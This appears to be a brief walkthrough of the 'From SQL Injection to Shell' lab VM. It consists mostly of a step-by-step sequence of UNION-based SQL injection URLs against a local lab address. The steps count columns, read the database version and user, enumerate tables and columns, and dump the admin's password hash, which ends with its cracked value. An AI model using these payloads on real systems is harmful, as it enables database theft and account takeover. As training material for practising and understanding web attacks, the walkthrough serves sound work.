This exercise explains how you can, from a SQL injection, gain access to the administration console, then in the administration console, how you can run commands on the system.
From SQL Injection to Shell VM Download
http://192.168.216.136/cat.php?id=1'
http://192.168.216.136/cat.php?id=1 order by 1
http://192.168.216.136/cat.php?id=1 order by 2
http://192.168.216.136/cat.php?id=1 order by 3
http://192.168.216.136/cat.php?id=1 order by 4
http://192.168.216.136/cat.php?id=1 order by 5 (error)
http://192.168.216.136/cat.php?id=-1 union select 1,2,3,4
http://192.168.216.136/cat.php?id=-1 union select 1,@@version,3,4
http://192.168.216.136/cat.php?id=-1 union select 1,user(),3,4
http://192.168.216.136/cat.php?id=-1 union select 1,table_name,3,4 from information_schema.tables
http://192.168.216.136/cat.php?id=-1 union select 1,column_name,3,4 from information_schema.columns where table_name='users'
http://192.168.216.136/cat.php?id=-1 union select 1,concat(id,0x3a,login,0x3a,password),3,4 from users
1:admin:8efe310f9ab3efeae8d410a8e0166eb2
P4ssw0rd